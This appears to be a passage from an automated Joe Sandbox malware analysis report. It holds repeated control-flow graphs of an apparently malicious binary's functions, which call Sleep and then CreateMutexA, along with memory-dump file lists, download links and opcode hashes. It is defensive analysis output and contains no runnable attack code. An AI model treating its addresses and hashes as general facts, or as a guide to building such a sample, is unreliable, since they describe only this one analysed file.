                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 5aad65a03c1b811d8bd812fd4f227dd4d49695d669f2f439a2d399ba26f3fbcb
                                                                                                                                                                                                                                                  • Instruction ID: d41ffcae412d42eed723fe0ad8808c19c8b62831d18dcf6832759c265077474e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aad65a03c1b811d8bd812fd4f227dd4d49695d669f2f439a2d399ba26f3fbcb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5311831A00210DBEB08AB68ED8975DF7E2EBC6310F244699E118AB3D5D77699C08752

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 343 b2a418-b2a438 347 b2a466-b2a482 343->347 348 b2a43a-b2a446 343->348 351 b2a4b0-b2a4cf 347->351 352 b2a484-b2a490 347->352 349 b2a448-b2a456 348->349 350 b2a45c-b2a463 call b3d663 348->350 349->350 355 b2a93f-b2a949 call b56c6a * 2 349->355 350->347 353 b2a4d1-b2a4dd 351->353 354 b2a4fd-b2a916 call b380c0 351->354 357 b2a492-b2a4a0 352->357 358 b2a4a6-b2a4ad call b3d663 352->358 360 b2a4f3-b2a4fa call b3d663 353->360 361 b2a4df-b2a4ed 353->361 374 b2a94e 355->374 375 b2a949 call b56c6a 355->375 357->355 357->358 358->351 360->354 361->355 361->360 376 b2a953-b2a994 Sleep CreateMutexA 374->376 377 b2a94e call b56c6a 374->377 375->374 379 b2a996-b2a998 376->379 380 b2a9a7-b2a9a8 376->380 377->376 379->380 381 b2a99a-b2a9a5 379->381 381->380
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 6958aae3fd7a2313b2745693df98f81000b6398726f54c96fe7f7dc672990167
                                                                                                                                                                                                                                                  • Instruction ID: 9ef5ce3c53aafc7e43df9af07594d48d477729c0a91788a275d3e043f9123fd4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6958aae3fd7a2313b2745693df98f81000b6398726f54c96fe7f7dc672990167
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A312A31A001109BEB08BB7CED8976DB7E2EFC5314F304299E4289B3D5DBB599C08752

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 383 b2a54d-b2a56d 387 b2a59b-b2a5b7 383->387 388 b2a56f-b2a57b 383->388 391 b2a5e5-b2a604 387->391 392 b2a5b9-b2a5c5 387->392 389 b2a591-b2a598 call b3d663 388->389 390 b2a57d-b2a58b 388->390 389->387 390->389 393 b2a944-b2a949 call b56c6a 390->393 397 b2a632-b2a916 call b380c0 391->397 398 b2a606-b2a612 391->398 395 b2a5c7-b2a5d5 392->395 396 b2a5db-b2a5e2 call b3d663 392->396 411 b2a94e 393->411 412 b2a949 call b56c6a 393->412 395->393 395->396 396->391 403 b2a614-b2a622 398->403 404 b2a628-b2a62f call b3d663 398->404 403->393 403->404 404->397 413 b2a953-b2a994 Sleep CreateMutexA 411->413 414 b2a94e call b56c6a 411->414 412->411 417 b2a996-b2a998 413->417 418 b2a9a7-b2a9a8 413->418 414->413 417->418 419 b2a99a-b2a9a5 417->419 419->418
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: d4a8df4d8a8e45e179e56f9d569b8a78664ae357d426b2980de04fa4669c1c82
                                                                                                                                                                                                                                                  • Instruction ID: 7d8b61a715340e5f370c2d2e34476e3db1d0d163907d17e0782c82b789e2ca67
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a8df4d8a8e45e179e56f9d569b8a78664ae357d426b2980de04fa4669c1c82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70314A31A001109BEB08EB78EDC976DF7E2EBC6714F344299E5189B3D5CB7599818712

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 421 b2a682-b2a6a2 425 b2a6d0-b2a6ec 421->425 426 b2a6a4-b2a6b0 421->426 427 b2a71a-b2a739 425->427 428 b2a6ee-b2a6fa 425->428 429 b2a6b2-b2a6c0 426->429 430 b2a6c6-b2a6cd call b3d663 426->430 433 b2a767-b2a916 call b380c0 427->433 434 b2a73b-b2a747 427->434 431 b2a710-b2a717 call b3d663 428->431 432 b2a6fc-b2a70a 428->432 429->430 435 b2a949 429->435 430->425 431->427 432->431 432->435 438 b2a749-b2a757 434->438 439 b2a75d-b2a764 call b3d663 434->439 441 b2a94e 435->441 442 b2a949 call b56c6a 435->442 438->435 438->439 439->433 446 b2a953-b2a994 Sleep CreateMutexA 441->446 447 b2a94e call b56c6a 441->447 442->441 453 b2a996-b2a998 446->453 454 b2a9a7-b2a9a8 446->454 447->446 453->454 455 b2a99a-b2a9a5 453->455 455->454
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: e4be515eadd56a5ea0987bc8683352c0937c25d66836ce73f4a0ecee83fb6d74
                                                                                                                                                                                                                                                  • Instruction ID: 5c007b851e597bf217a716abf0c5a5c1994a93024e6338eb9497721a169c4f55
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4be515eadd56a5ea0987bc8683352c0937c25d66836ce73f4a0ecee83fb6d74
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 213128316002109BEB08DB78EDC976DB7F2EBC5314F248699E1189B3E5CB7599808756

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 457 b29adc-b29ae8 458 b29aea-b29af8 457->458 459 b29afe-b29b27 call b3d663 457->459 458->459 460 b2a917 458->460 466 b29b55-b29b57 459->466 467 b29b29-b29b35 459->467 462 b2a953-b2a994 Sleep CreateMutexA 460->462 463 b2a917 call b56c6a 460->463 471 b2a996-b2a998 462->471 472 b2a9a7-b2a9a8 462->472 463->462 473 b29b65-b29d91 call b37a00 call b25c10 call b28b30 call b38220 call b37a00 call b25c10 call b28b30 call b38220 466->473 474 b29b59-b2a916 call b380c0 466->474 469 b29b37-b29b45 467->469 470 b29b4b-b29b52 call b3d663 467->470 469->460 469->470 470->466 471->472 476 b2a99a-b2a9a5 471->476 476->472
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00B2A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
